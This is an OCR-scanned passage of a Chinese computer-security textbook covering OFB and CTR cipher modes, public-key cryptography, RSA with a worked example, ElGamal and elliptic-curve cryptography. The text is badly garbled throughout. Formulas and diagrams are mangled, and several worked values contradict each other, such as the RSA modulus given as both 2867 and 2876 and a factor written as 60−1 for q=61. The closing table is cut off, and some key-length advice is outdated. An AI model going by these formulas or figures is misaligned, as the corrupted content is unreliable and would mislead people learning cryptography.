将 此 密 钥 流 和 明文 流 进 行 异 或 可 得 密 文 流 ,仍然 需要 一 个 初始 向 量 Vi, Vi 应 当 唯 一 但 无 须 
保密 。 不 同 之 处 是 OFB 模式 将 加 密 算法 的 输出 反馈 到 移 位 寄存 器 ,而 CFB 模式 是 将 密 文 


64 位 = 一 一 64 位 -一 …. 
左 移 /位 左 移 位 Cr 
| 6 位 | 从 64- 位 | 从 太 
| | | | 
64 位 64 位 一 | 64 位 
1 1 1 
K 一 | 加 窗 K 一 | 加 窗 大 一 ~| 加密 
1 | | 
:| 站 | 645j 位 (丢弃) /位 [64 位 (丢弃 ) | ;| /位 | 64j 位 (丢弃 ) 
t= to 
Cm ee Ci 十 Ci -0 
Pa P; P 


图 3.12 OFB 的 加 密 模式 
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单元 ( 共 j 位 ) 反 馈 到 移 位 寄存 器 。 与 CFB 模式 相 比 ,OFB 模式 的 优点 是 传输 过 程 中 的 位 错 
误 不 会 被 传播 。 例 如 ,C, 中 出 现 1 位 错误 ,在 解密 结果 中 只 有 P 会 受到 影响 ,以 后 各 明文 
单元 则 不 受 影响 。 而 在 CFB 中 ,Ci 也 作为 移 位 寄存 器 的 输入 ,因此 它 的 1 位 错误 会 影响 到 
解密 结果 中 各 明文 单元 的 值 。 
C= Pi@S; S$:= Er(Si) 
Pi=C@5; 5;= Er(Si) 
重复 运算 ,得 到 的 C ,C;,…,C, 就 是 最 终 的 密 文 。 
OFB 模式 的 缺点 是 难于 检测 密 文 是 否 被 自 改 。 如 在 密 文中 取 1 位 的 补 ,那么 在 恢复 后 
的 明文 中 相应 位 置 的 位 也 为 原 位 的 补 。 因 此 攻击 者 有 可 能 通过 对 数据 部 分 和 校 验 部 分 同时 
进行 算 改 ,导致 纠 错 码 无 法 检测 。 


5. 计数 模式 ctrti ctrti 
CTR 模式 使 用 一 个 计数 器 ctr( 也 是 一 个 初 | | 
始 向 量 ) ,如 图 3.13 所 示 。 K—™ Ex K—=| Ex 
C= E(tt4D Db b= Et 一 
注意 ,该 模式 不 需要 计算 E 的 逆 。 该 模式 
的 优点 是 可 以 并 行 ,可 以 预 处 理 ,可 证 明 其 安全 C p 
界 至 少 与 CBC 一 样 好 ,加 密 与 解密 仅 涉及 密码 算 (a) 加 密 (b) 解密 
法 的 加 密 , 等 等 。 图 3.13 CTR 模式 


3.3 公 钥 密码 
3.3.1 公开 密 钥 体制 与 单 向 陷 门 函数 


1976 年 ,美国 学 者 Diffie 和 Hellman 为 解决 密 钥 的 分 发 与 管理 问题 发 表 了 著名 论文 
New Direction in Cryptography, 提 出 一 种 Diffe-Helman 密 钥 交换 协议 ,允许 在 不 安全 的 介 
质 上 通过 通信 双方 交换 信息 ,安全 地 传送 秘密 密 钥 。 该 论文 首次 提出 公开 密 钥 体制 概念 , 开 
创 了 现代 密码 学 的 新 领域 ,对 密码 学 的 发 展 有 着 极为 重要 的 意义 。 

公开 密 钥 算法 (Public-key Algorithm ,也 叫 非 对 称 算法 ) 的 典型 特点 是 : 

(1) 算法 中 有 一 对 密 钥 (pk,sk) 。 其 中 pk (Public Key) 是 公开 密 钥 (简称 公 钥 ), 公 铀 
可 以 在 密 钥 簿 上 查找 ,可 以 用 来 加 密 或 解密 。 另 一 个 密 钥 sk(Private Key) 是 私人 密 钥 ( 简 
称 私 钥 ) , 私 钥 是 保密 的 ,也 可 以 用 来 加 密 或 解密 。 加 密 密 钥 或 解密 密 钥 不 能 或 者 很 难 相 互 
推导 出 来 。 

(2) 算法 的 公 钥 和 私 钥 必须 配对 使 用 。 如 果 使 用 公 钥 加 密 时 ,就 必须 使 用 相应 的 私 钥 
解密 ;如 果 使 用 私 钥 加 密 时 ,也 必须 使 用 相应 的 公 钥 解密 。 

(3) 算法 进行 加 密 和 解密 时 可 以 使 用 不 同 的 加 密 密 钥 和 解密 密 钥 对 。 

(4) 算法 建立 在 严格 的 数学 基础 上 , 公 钥 和 私 钥 的 产生 也 是 通过 数学 方法 产生 的 。 公 
开 密 钥 算法 的 安全 性 建立 在 某 个 数学 问题 很 难 解决 的 基础 上 。 

公 钥 密码 体制 基于 单 向 陷 门 函数 。 所 谓 单 向 函数 是 指 有 许多 函数 正 向 计算 上 是 容易 
的 ,但 求 其 逆 的 计算 是 不 可 行 的 或 很 难 的 。 即 已 知 x 很 容易 计算 f(z) ,但 已 知 f(z) 却 难以 
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计算 出 z。 

在 密码 学 中 最 常用 的 单 向 函数 有 两 类 : 一 类 是 公开 密 钥 密 码 中 使 用 的 单 向 陷 门 函数 ， 
另 一 类 是 消息 摘要 中 使 用 的 单 向 散 列 (或 Hash) 函 数 。 

单 向 陷 门 函数 是 有 一 个 陷 门 的 一 类 特殊 单 向 函数 。 但 是 ,如 果 知 道 单 向 函数 的 那个 秘 
密 陷 门 , 则 也 能 很 容易 逆向 计算 这 个 函数 。 即 一 旦 给 出 /(x) 和 秘密 信息 y(y 称 为 陷 门 信 
息 )， 就 很 容易 计算 zx。 在 公开 密 钥 密码 中 ,计算 /(z) 相 当 于 加 密 , 陷 门 y 相当 于 私有 密 钥 ， 
而 利用 陷 门 y 求 /(z) 中 的 z 则 相当 于 解密 。 因 此 可 以 利用 具有 陷 门 信息 的 单 向 函数 构造 
公开 密 钥 密码 。 

数学 上 有 很 多 函数 看 起 来 很 像 单 向 函数 ,人 们 能 够 有 效 地 计算 它们 ,但 至 今 未 找到 有 效 
的 求 逆 算 法 。 例 如 ,将 许多 大 质数 相 乘 要 比 将 其 乘积 因 式 分 解 容易 得 多 。 把 离散 对 数 函 数 、 
RSA 函数 等 看 成 单 向 函数 ,但 是 ,目前 还 不 能 严格 地 证 明 这 些 单 向 函数 真正 难以 求 逆 。 


3.3.2 RSA 算法 


RSA 算法 是 在 1978 年 由 美国 麻 省 理工 学 院 三 位 密码 学 专家 Ron Rivest、Adi Shamir 
和 Leonard Adleman 发 明 的 。RSA 算法 是 一 种 典型 的 公开 密 钥 体 制 算 法 ,是 对 密码 学 的 一 
个 杰出 贡献 。RSA 算法 得 到 了 最 广泛 的 应 用 ,并 于 1992 年 被 国际 标准 化 组 织 正式 纳入 国 
际 标准 。 

与 传统 的 对 称 密码 算法 相 比 ,RSA 算法 为 实现 数字 签名 和 数字 认证 提供 了 手段 ,而 用 
DES 无 法 实现 这 一 功能 。 另 一 个 优势 是 在 一 个 具有 N 个 结 点 的 网 络 中 进行 数据 加 密 时 ， 
DES 算法 需要 使 用 NCN 一 1)/2 对 密 钥 ,而 RSA 算法 只 需要 N 对 密 钥 ,大 大 减轻 了 密 钥 分 
配 与 管理 的 工作 量 。 不 过 ,RSA 要 比 DES 算法 的 速度 慢 得 多 ,硬件 实现 时 RSA 要 比 DES 
算法 慢 1000 倍 ,软件 实现 时 也 要 比 DES 算法 慢 100 倍 。 

1. RSA 算法 数学 基础 

定义 1: 对 一 个 自然 数 已 ,如 果 己 只 能 被 1 和 自身 除 尽 , 则 称 PP 为 素数 (或 质数 ) ,否则 
为 合 数 。 

定义 2: 如 果 整 数 a 与 整数 5 的 最 大 公约 数 是 1, 则 称 a 与 5 互 为 质数 。 

例如 ,2 和 3,7 和 11 等 都 是 互 为 质数 。 

定义 3: 欧 拉 函数 eg(~) 定 义 为 g(r) 王 r(1 一 1/P,)(1 一 1/P:,)…(1 一 1/P,) ,PP ，…P， 
是 7 的 质 因 子 , 即 公约 数 。 欧 拉 函 数 o(~) 是 用 来 计算 1,2,3,…,r 中 有 多 个 数 与 ~ 互 为 质 
数 的 。 

例如 , 当 7r==20 时 ,由 于 r= 二 2X2X5, 即 20 的 公约 数 是 2 和 5。 

所 以 ,gp(20)=20X (1 一 1/2)X (1 一 1/5)=8 即 在 1~20 个 整数 中 有 8 个 与 20 互 质 的 
数 ,它们 是 1,3,7,9,11,13,17,19。 

定义 4: 两 个 整数 a,b 分 别 被 m 整除 ,如 果 所 得 余数 相同 , 则 称 a 与 5 对 模 m 是 同 余 
的 , 记 作 a=b(mod m)。 

2. RSA 算法 基础 

执行 RSA 算法 时 需要 一 些 基本 运算 ,这 些 运算 可 以 看 成 是 RSA 算法 的 基础 。 

(1) 产生 素数 

素数 具有 如 下 特点 : 凡 素数 n 必 不 能 被 2~~Yn (实际 上 一 个 数 的 最 大 公约 数 小 于 或 等 
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于 Vn) 之 间 的 所 有 素数 整除 ; 除 2 以 外 所 有 素数 为 奇数 ,由 素数 的 定义 决定 算法 。 
判断 1~N 个 数 中 的 n 是 否 为 素数 的 具体 算法 是 : 
@ 令 n 从 3 开始 (3 是 素数 ); 
@ 每 次 增加 2,n==n 十 2( 排 除了 偶数 ); 


@ nn 被 所 有 小 于 等 于 Yn 的 素数 整除 ; 

@ 若 不 存在 被 整除 的 数 , 则 ”为 素数 。 

(2) 求 最 大 公约 数 

设 bc 为 整数 ,0>0,c>0,0>c( 使 用 这 个 条 件 不 影响 算法 ,但 可 避免 符号 问题 ) ,2、c 的 
最 大 公约 数 记 为 gcd(5,c)。 可 以 利用 欧 几 里 德 算法 , 即 重复 使 用 带 余数 除法 求 最 大 公 
约 数 。 

欧 几 里 德 算法 : 每 次 的 余数 为 除数 , 除 上 一 次 的 除数 ,直到 余数 为 0 时 为 止 , 则 上 次 余 
数 为 最 大 公约 数 。 可 以 先 设 5 为 上 次 的 除数 ,c 为 余数 , 按 欧 几 里 德 算法 求 出 gcd(b,c)。 

例如 , 求 (50,35) 的 最 大 公约 数 。 设 上 次 的 除数 5 二 50, 余 数 c= 二 35。 

用 余数 c 除 上 次 的 除数 : b/c 二 50/35 二 35/35 十 15/35,15 为 余数 ,35 为 上 次 的 除数 。 根 
据 欧 几 里 德 算法 有 35/15 二 30/15 十 5/15,5 为 余数 ,15 为 上 次 的 除数 ;15/5=15/5 十 0/5, 余 
数 为 0, 上 次 余数 是 5。 所 以 gcd(50,35)=5。 

(3) 求 乘 逆 算法 

设 a*b 三 1(mod 7), 已 知 a 求 5, 称 求 a 对 于 模 > 的 乘 逆 5, 并 称 a 与 5 对 7 互 为 乘 道 。 
也 可 以 写成 5=a ! mod r。 

求 乘 逆 时 也 可 以 利用 欧 几 里 德 算 法 , 即 重复 使 用 带 余数 除法 。 但 与 求 最 大 公约 数 不 同 ， 
即 每 次 的 余数 为 除数 , 除 以 上 次 的 除数 ,直到 余数 为 1 时 为 止 。 

先 令 a 作为 余数 ,r 作为 上 次 的 除数 ,根据 欧 几 里 德 算法 ,由 数学 归纳 法 可 以 证 明 求 a 
的 乘 逆 4 的 递 推 公式 如 下 : 

二 0 三 
b= bs bg; 

其 中 j 为 整数 ,从 1 开始 ,gq; 是 x;/a; 的 整数 部 分 。 当 x;/aj 的 余数 为 1 时 ,a 的 乘 逆 5= 1b;|。 

例如 ,已 知 a，5 二 1(mod 7), 设 a 二 3,r 二 14, 求 a 的 乘 逆 5。 

解 : 令 a 二 3 作为 余数 ,r= 二 14 作为 上 次 的 除数 ,根据 欧 几 里 德 算 法 , 即 r/a=g; 十 c, 可 以 
写成 : 


r=qg*atrn, 14=4.3+2, qa=4, a=3, n=21 
bi 一 0 一 Oldqi 一 0 一 0。ql 一 0 一 1。4 4 
由 于 余数 不 为 1, 还 要 进行 欧 几 里 德 算 法 ,已 知 余数 为 2, 上 次 的 除数 为 3, 即 : 
3 王 1。2 十 1， 9 ls,rs 中 
b=b bg 一 1 一 (一 4)。1 王 5 
由 于 余数 为 1, 因 此 a 的 乘 逆 b 等 于 5。 
3. RSA 算法 过 程 
(1) 选择 密 钥 
@ 选择 两 个 不 同 的 素数 p、g。 
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@ 计算 公开 模 数 r=pXg。 

@ 计算 欧 拉 函数 g(7)==(p 一 1) X(g 一 1)。 

@ 选择 一 个 与 o(r) 互 质 的 量 &, 即 保证 gcd(o(r),k) 二 1 时 选择 &。 可 以 令 sp 二 
或 pk 二。 

因为 与 o(7) 互 质 的 数 可 能 不 止 一 个 ,所 以 的 值 是 有 选择 的 。 可 以 先 设 为 一 个 初 
值 ,并 且 有 二 o (7), 然 后 用 试探 法 求 出 满足 条 件 o(7) 与 & 的 最 大 公约 数 为 1 的， 
即 gcd(g(7),k)=1。 

注意 ,如 果 选 一 个 密 钥 的 值 大 于 o(x) 的 值 ,就 不 能 正确 求 出 另 一 个 密 钥 。 

@ 根据 sk， pk 二 1 mod 9(7) ,已 知 sk 或 pk ,用 乘 逆 算法 求 pk 或 sk。 

(2) 加 密 

RSA 算法 加 密 是 针对 十 进 制 数 加 密 的 ,将 明文 P 分 成 块 Pi, 并 要 求 每 块 长 度 小 于 
值 , 即 P= PiP,…P;。 然 后 用 每 块 明文 自 乘 pk 次 寡 或 次 次 短 , 再 按 模 7 求 余 数 ,就 得 到 密 
Ee 

密 文 C; 二 PK mod r, 密 文 序列 C=CiC,*…C; 

注意 ,如 果 选 P; 三 r, 将 不 能 得 到 正确 的 加 密 和 解密 结果 。 

(3) 解密 

RSA 算法 解密 与 加 密 基本 相同 ,将 每 块 密 文 自 乘 sk 次 究 或 pk 次 宕 ,再 按 模 上 求 余数 ， 
就 得 到 明文 了 。 

明文 P;= 二 C* mod r, 明 文 序列 P= PiP,…P;。 

(4) 平方 - 乘 算法 

使 用 RSA 算法 加 密 和 解密 时 需要 计算 mx mod r 的 值 ,由 于 wm 的 值 巨 大 ,直接 计算 很 
容易 超出 计算 机 的 数值 计算 范围 ,并 且 需 要 消耗 大 量 的 计算 机 时 间 。 使 用 “平方 - 乘 ” 的 算 
法 来 计算 ,可 以 极 大 地 提高 计算 速度 ,并且 避 兔 了 计算 机 数值 溢出 的 发 生 。 

平方 - 乘 算法 是 先 将 a 转换 为 二 进 制 数 5, 用 b; 表示 4 的 第 i 位 值 ,L 为 5 的 二 进 制 位 
数 ,例如 5 的 二 进 制 数 是 101, 位 数 是 3。 

先 令 c= 二 1,i==L 一 1, 具 体 算法 如 下 : 

@ 计 算 c=cXe mod r。 

@ 当 b,==1 时 ,计算 c=cXm mod rr;b; 二 0 时 ,不 做 任何 计算 。 

@ ;=; 一 1。 

重复 四 一 回 步 ,直到 ;一 0 时 为 止 , 则 c 就 是 m* mod 7 的 值 。 

下 面 举 一 个 例子 说 明 RSA 加 密 和 解密 过 程 。 

J@ 选 素 数 , 例 如 选 p= 二 47,g 二 61。 

@ 计算 公开 模 数 r=pXg=47X61=2867。 

@ 计算 欧 拉 函数 g(r)=(p 一 1)(g 一 1)==(47 一 1)(60 一 1)=2714。 

@ 利用 求 最 大 公约 数 的 算法 选择 一 个 与 o(r) 互 质 的 量 &, 可 以 选 & 一 167 ,并 令 sk 二 k= 二 
167。 

@ 根据 sk， pk 三 1 mod o(r) ,用 求 乘 逆 算法 求 出 pk 二 1223。 这 样 就 可 以 求 出 RSA 算 
法 的 三 个 关键 值 : r* 一 2876 ,pk 二 1223 ,sk 二 167。 

加 密 时 ,假如 明文 P==123456789, 将 明文 分 成 三 组 , 即 P= 二 123,P, 二 456, Ps 二 789。 
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用 私人 密 钥 sk 加 密 得 Ci = Pile mod r= 二 1770, C= 二 1321,C; 二 1297, 所 以 密 文 C= 
1770 1321 1297。 

@ 解密 时 ,如 用 公开 密 钥 pk 解密 时 ,只 要 计算 : 

P, = Cl modr=123 P, 一 456， P: 一 789 

所 以 明文 还 原 为 P 一 123456789 。 

4. RSA 算法 安全 性 

RSA 算法 的 安全 性 取决 于 pg 的 保密 性 ,以 及 分 解 大 数 的 难度 , 即 已 知 7==pXg, 分 解 
出 pg 的 困难 性 ,所 以 在 计算 出 +r 后 要 立即 彻底 删除 p、g 值 。 

目前 攻击 RSA 算法 主要 有 两 种 一 种 是 从 中 企图 分 解 出 p、gq, 另 一 种 是 穷 举 密 钥 法 ， 
穷 举 法 没有 分 解 大 数 有 效 。 当 前 运用 计算 机 和 素数 理论 已 能 够 分 解 出 129 位 长 的 十 进 制 数 
( 约 425 位 二 进 制 数 ) 。 

一 般 来 说 , 密 钥 长 度 越 长 安全 性 越 好 。RSA 实验 室 建 议 , 个 人 使 用 RSA 算法 时 ,公开 
模 数 ~ 的 长 度 是 768 位 , 即 768 位 二 进 制 数 ,公司 要 用 1024 位 ,极其 重要 的 单位 要 用 2048 
位 。 当 然 , 密 钥 太 长 时 ,加 密 、 解 密 速度 会 太 慢 , 影 响 效率 。 

为 了 提高 分 解 大 数 难度 ,在 选 pg 时 还 要 注意 以 下 几 点 : 

(1) 要 使 pg 是 强 素数 ，; 

(2) p 与 gq 的 值 必须 相差 很 大 ,有 人 建议 至 少 要 在 10 倍 左右 ， 

(3) p 一 1 与 4 一 1 的 最 大 公 因子 应 很 小 。 


3.3.3 Elgamal 密码 系统 


Elgamal 密码 系统 是 根据 它 的 发 明 者 Taher Elgamal 命名 的 , 它 是 一 种 随机 化 的 公 钥 密 
码 系统 ,对 相同 明文 的 独立 加 密 可 能 产生 不 同 的 密 文 。 它 将 输入 块 作为 数 ,对 这 些 数 实 施 算 
术 运 算 来 执行 加 密 和 解密 。 

在 数 系 Z, 中 ,所 有 算术 运算 都 由 模 素 数 p 完成 ,如 果 对 于 Z, 中 的 每 个 正 整数 ,都 有 
一 个 整数 ,使 i 二 g* mod p, 则 在 2 中 的 数 g 是 模 p 的 原 根 ( 也 称 为 本 原 元 ) 。 

已 证 明 , 对 于 Z, 的 原 根 , 有 oleo(p))==o(p 一 1)。 所 以 可 以 测试 不 同 的 数 ,直到 找到 是 
原 根 的 数 。 为 了 测试 一 个 数 g 是 否 是 原 根 , 它 应 该 满足 : 对 于 6o(p) 二 p 一 1 的 每 个 素数 因子 
Pi, 测 试 g* ?mod p 关 1。 如 果 一 个 数 不 是 原 根 , 则 其 中 一 个 每 将 等 于 1。 在 正常 情况 下 ， 
通过 因子 p 一 1 找到 所 有 素数 因子 是 非常 难 的 。 但 是 ,实际 上 通过 选择 一 个 已 知 因子 p 一 1 
的 素数 p, 可 以 使 这 项 任务 变 得 相对 简单 。Elgamal 们 密码 系统 需要 这 样 一 个 原 根 ,所 以 在 
此 假设 ,对 于 任何 选 定 的 数 p, 都 能 在 Z, 中 快速 找到 原 根 g 。 

一 旦 有 了 原 根 g ,对 于 任何 值 &, 都 能 有 效 地 计算 x 二 g* mod p。 反 之 ,给 定 x.g 和 p， 
通过 x 二 g* mod p 确定 的 问题 就 称 为 离散 对 数 问 题 。 而 因数 分 解 、 离 散 对 数 问 题 是 非常 
难以 计算 的 。Elgamal 密码 系统 的 安全 性 就 依赖 于 离散 对 数 问题 的 难度 。 

在 一 个 有 限 域 Z,(p 是 素数 ) 上 的 求解 离散 对 数 问 题 可 以 表述 为 : 给 定 Z, 的 一 个 本 原 
元 a ,对 5E 2Z? ,寻找 唯一 的 整数 (0 过 二 p 一 2) ,使 得 at 二 5 mod p, 记 为 k= 二 log,b。 一 般 
的 ,如 果 仔 细 选 择 p, 则 认为 该 问题 是 困难 的 。 目 前 还 没有 找到 计算 离散 对 数 问 题 的 多 项 式 
时 间 算 法 。 为 了 抗击 已 知 的 攻击 ,p 应 该 至 少 是 150 位 以 上 的 十 进 制 整数 ,并 且 p 一 1 至 少 
有 一 个 大 的 素 因子 。 


115 


《计算 机 系统 安全 》 下 于 且 3 


要 设计 一 个 EIGamal 密码 体制 ,需要 完成 如 下 步 又 : 

(1) 选择 足够 大 的 素数 p 使 得 求解 离散 对 数 问题 在 Z, 上 是 困难 的 。 

(2) 在 Z; 中 选择 一 个 本 原 元 a 。 

(3) 随机 选择 整数 7 使 得 Oj<p 一 2, 并 计算 b==a’ mod p。 

(4) 对 密 钥 k= 二 (p,a,j,0) ,定义 加 密 变 换 E(x, 7)==(y1， ys), 这 里 明文 -E22 ,r(0 委 
7 过 p 一 2) 是 每 次 加 密 前 随机 选择 的 随机 数 ,yi 二 a” mod p ,ys 二 xb" mod p; 定 义 解 密 变 换 为 
Di(y1, yz) 二 ys(yi) ! mod pp, 这 里 密 文 (y1， ys) E27 XZ;。 

(5) 以 {p, a, 分 为 公开 密 钥 ,) 为 私有 密 钥 。 

这 样 就 建立 了 一 个 明文 空间 P=2Z; 、 密 文 空间 C=Z; X 2; 、 密 钥 空 间 K={(p,a, j， 
0b),p 是 大 素数 ,a 是 Z; 的 一 个 本 原 元 ,0<j 二 p 一 2,0 二 a’ mod p} 的 ElGamal 密码 体制 。 

ElGamal 密码 体制 是 非 确定 性 的 ,因为 每 次 加 密 都 要 选择 一 个 随机 数 ,相同 的 明文 随 着 
加 密 前 随机 数 x 的 不 同 而 产生 不 同 的 密 文 。 这 也 是 EIGamal 密码 体制 的 工作 原理 : 明文 x 
通过 乘 以 b" 来 隐藏 ,产生 y, , 值 er 也 作为 密 文 的 一 部 分 进行 传送 。 知 道 秘密 密 钥 j 的 收 方 
能 够 从 a" 中 计算 出 5", 并 可 以 通过 yw 除 以 来 去 掉 隐藏 而 得 到 明文 x。 

例子 : 假设 p==2579,4a==2,j==765, 则 65==2”mod 2579 二 949。 如 果 A 要 发 送 消息 x+= 
1299 给 B, 则 A 选择 随机 数 r=853 并 计算 wm =2853 mod 2579 一 435 和 ys 二 1299 X 949853 
mod 2579 二 2396。A 发 送 密 文 了 = (435,2396) 给 B,B 收 到 密 文 后 ,计算 x = 2396 X 
(435755) -1mod 2579 二 1299, 得 到 A 加 密 的 明文 。 


3.3.4 ”椭圆 曲线 密码 体制 


El1Gamal 密码 体制 能 够 在 任何 离散 对 数 难 处 理 的 有 限 群 中 实现 。 已 经 使 用 了 乘法 群 
你 ,但 其 他 群 也 是 合适 的 候选 者 ,如 椭圆 曲线 群 。 

椭圆 曲线 在 代数 学 和 几何 学 上 已 广泛 研究 了 150 多 年 之 久 , 有 丰富 而 深厚 的 理论 积累 。 
椭圆 曲线 密码 体制 (Elliptic Curve Cryptosystem, ECC) 在 1985 年 由 Koblitz 和 Miller 提 
出 ,不 过 一 直 没 有 像 RSA 等 密码 系统 一 样 受 到 重视 。 目 前 ,椭圆 曲线 已 经 逐渐 被 采用 ,是 一 
个 重要 的 发 展 方向 。 

1. 一 般 椭圆 曲线 

椭圆 曲线 并 非 椭 圆 ,这 么 命名 是 因为 它们 是 由 三 次 方程 描述 的 ,而 这 些 三 次 方程 类 似 于 
计算 椭圆 周 长 的 方程 。 一 般 的 ,描述 椭圆 曲线 方程 的 形式 是 : 

y+aryt+by =zx +cr!+drtie 

其 中 abc.d 和 e 是 满足 一 些 简 单条 件 的 实数 。 

一 般 来 说 ,椭圆 曲线 还 包含 了 一 个 特殊 的 点 , 即 称 为 无 穷 远 点 (Point at Infinity) 或 零点 
(Zero Point) 的 O。 下 面 给 出 两 个 椭圆 曲线 的 例子 ,这 些 公 式 有 时 会 产生 看 上 去 很 奇怪 的 
曲线 。 

对 于 椭圆 曲线 上 的 点 定义 一 种 形式 的 加 法 : 如 果 一 个 椭圆 曲线 上 的 三 个 点 处 于 一 条 直 
线 上 ,那么 它们 的 和 为 O。 从 这 个 定义 可 以 导出 椭圆 曲线 上 点 的 加 法 法 则 : 

(1) 0 是 加 法 的 单位 元 ,因而 0= 一 0; 对 于 椭圆 曲线 上 的 任何 一 点 P, 有 P 十 O=P。 

(2) 一 条 与 x 轴 垂 直 的 线 和 曲线 相交 于 两 个 x 坐标 相同 的 点 Pi 二 (zx,y) 和 P, = 
(zx, 一 y) ,同时 它 也 和 曲线 相交 于 无 穷 远 点 ,因此 Pi 十 Ps 十 0 二 O。 因 而 一 个 点 的 负 值 是 与 
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其 有 着 相同 zx 坐标 和 相反 y 坐标 的 点 。 

(3) 要 对 具有 不 同 z 坐标 的 两 个 点 Q 与 R 进行 相 加 , 先 在 它们 之 间 画 一 条 直线 并 求 出 
第 三 个 交点 Pl。 容易 看 出 这 种 交点 是 唯一 的 。 注 意 到 Q 十 R 十 Pi 二 0, 有 Q 十 R= 一 Pi。 特 
别 地 , 当 Q= 尺 时 ,相当 于 对 一 个 点 Q 加 倍 ,只 需 画 出 一 条 切线 并 求 出 另 一 个 交点 S, 那 么 
Q+Q=2Q= 一 5。 

显然 ,根据 定义 ,此 类 加 法 满足 交换 率 和 结合 率 。 而 一 个 点 的 倍 乘 定义 为 : 

7 了 一 P 十 P 十 P 十 … 十 P (n 个 P 相 加 ) 

2. 有 限 域 上 的 椭圆 曲线 

密码 学 中 关心 的 是 有 限 域 下 上 的 椭圆 曲线 。 讨 论 比较 多 的 是 素 域 F, 上 的 椭圆 曲线 ， 
这 里 p 是 一 个 素数 。 选 择 两 个 小 于 p 的 非 负 整 数 a 和 2 满足 : 

4a3 十 2702(mod p) 关 0 

用 EF,(a,b) 表 示 如 下 模 p 的 椭圆 群 中 的 点 (或 如 下 有 限 域 ,上 的 椭圆 曲线 的 点 ) ,再 加 
上 一 个 无 穷 远 点 0。 设 (rz,y) 是 Ep(la,b) 中 的 点 ,x 和 y 是 小 于 p 的 非 负 整数 , 则 有 如 下 椭 
圆 曲 线 方程 : 


y =z +art+b (mod p) 
如 取 p=23,4a==5 二 1, 有 4X1 十 27X1?(mod 23)==8 关 0, 则 y==z? 十 z 十 1 是 椭圆 曲 
线 。 因 此 Es(1,1) 是 一 个 模 23 的 椭圆 群 。 
注意 到 六 二 十 x 十 1 正 是 图 3. 14 中 的 一 个 方程 。 我 们 只 关心 这 个 图 中 满足 方程 并 且 


在 以 (0,0) 和 (p,p) 为 顶点 的 正方 形 中 坐标 为 整数 的 点 。 产 生 Ex (1,1) 中 点 的 过 程 如 下 ; 
yh 
4 上 
2 上 
OE 
-2 上 
-4 上 


图 3.14 = 十 xz 十 1 的 椭圆 曲线 


(1) 对 z=0,1,2,…,P 一 1, 计 算 zs 十 z 十 1 (mod p)。 

(2) 对 于 第 四 步 得 到 的 每 个 结果 确定 它 是 否 有 一 个 模 p 的 平方 根 ,如 果 没 有 , 则 
Ex (1,1) 中 没有 具有 与 该 结果 相应 的 zx 坐标 的 点 。 如 果 有 ,就 有 两 个 平方 根 y 和 pp 一 y, 从 
而 点 (x,y) 和 (z,p 一 y) 是 Ess(1,1) 中 的 点 (特别 情况 下 ,如 果 结 果 是 0, 只 有 一 个 点 (zx,0))。 

E,(a,b) 上 的 加 法 规则 : 

(1) P+O=P; 

(2) 如 果 P=(z,y), 则 P 十 (zx, 一 y)==0; 点 (xz, 一 y) 是 P 的 加 法 逆 元 , 记 为 一 P; 
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(3) 如 果 P=(ziyy),Q=(zy) ,并且 P 夫 一 Q, 则 P+Q= (zs,ys) 由 下 列 规则 确定 ， 
x3=A—xi—zx (mod p), ys=A(zi—z3)—y (mod p) 

其 中 : 关 P 关 Q,; 则 4==(ys 一 yD)/(zzs 一 z1); 若 P==Q; 则 4=(3x? 一 a)/(2y1)。 

3. 椭圆 曲线 密码 算法 

基于 椭圆 群 上 的 离散 对 数 问题 ,可 以 用 椭圆 曲线 密码 (Ecc) 算 法 加 密 , 具 体 方法 如 下 : 

首先 选择 一 个 点 G 和 一 个 椭圆 群 E,(a,5) 作 为 参数 ,用 户 A 选择 一 个 私有 密 钥 ns 并 
产生 一 个 公开 密 钥 PA 二 naG。 发 送 者 要 加 密 并 发 送 一 个 报 文 Pu。 给 A, 可 选择 一 个 随机 整 
数 &, 并 产生 由 如 下 点 对 组 成 的 密 文 C。 == (ke，,P 十 kPa)。 

注意 ,这 里 使 用 了 A 的 公开 密 钥 Ph。 要 解密 这 个 报 文 ,A 用 这 个 点 对 的 第 一 个 点 乘 以 
A 的 私有 密 钥 ,再 从 第 二 个 点 中 减 去 这 个 值 : 

Pt RPA—na(kG) = 了。 十 RCIAG) —na(kG) = P, 

发 送 者 通过 对 P,, 加 上 RP。 来 保护 P, 。 除 了 发 送 者 之 外 没有 人 知道 的 值 ,因此 即便 
PA 是 公开 密 钥 也 没有 人 能 去 掉 APA。 当 然 ,只 有 知道 za 的 人 才 可 以 去 掉 kPa。 攻击 者 在 
不 知道 ns 的 情况 下 要 想得到 报 文 只 能 在 知道 G 和 kG 的 情况 下 计算 出 &, 这 归结 为 求解 椭 
圆 曲 线 离散 对 数 问题 ,是 非常 困难 的 。 

注意 到 以 上 的 过 程 并 没有 说 明 怎样 将 作为 字符 串 ( 当 然 可 以 看 成 分 段 的 整数 ) 的 消息 编 
码 嵌 入 到 椭圆 群 的 点 中 (将 明文 向 入 椭圆 曲线 ) ,实际 中 的 转化 方式 多 种 多 样 ,关键 的 步骤 与 
其 正确 性 证 明 都 涉及 复杂 的 数学 推导 ,可 以 参看 相关 文献 。 

4. 椭圆 曲线 密码 体制 的 安全 性 

椭圆 曲线 密码 体制 的 安全 性 依赖 于 求解 椭圆 曲线 离散 对 数 问 题 的 困难 性 , 即 已 知 椭圆 
曲线 上 的 点 P 了 和 kP 计算 的 困难 程度 。 通 过 对 目前 计算 椭圆 曲线 对 数 和 分 解 大 数 因子 的 
难度 比较 ,与 RSA 相 比 ECC 可 以 用 小 得 多 的 密 钥 取得 与 RSA 相同 的 安全 性 。 另 外 ,在 密 
钥 大 小 相等 时 ,ECC 与 RSA 所 需要 的 计算 量 相 当 。 因 此 ,在 安全 性 相当 的 情况 下 ,使 用 
ECC 比 使 用 RSA 具有 计算 上 的 优势 。 两 者 都 可 以 用 于 加 解密 、 密 钥 交 换 和 数字 签名 。 


3.3.5 ”对称 加 密 体制 与 公开 密 钥 体制 比较 
对 称 加 密 体制 与 公开 密 钥 算法 体制 的 比较 如 表 3. 13 所 示 。 


表 3.13 对 称 加 密 体制 与 公开 密 钥 算法 体制 的 比较 


| | NN 个 成 员 | 加 解密 密 钥 | | 芭 员 

密 钥 体制 | 密 铀 产生 | “ 密 乌 数 ” | 相互 推 时 | 通信 | 计算 速度 | 安全 性 | 用 途 
| 本 本 使 用 安全 通道 | 加 密 大 量 

对 称 加 密 | 基于 规则 | NCN 一 1)/2| 相同 或 易 | 协 高 传递 密 负 | 亿 鸯 | 加 

严格 数学 | 、， 加 密 小 量 信息 、 

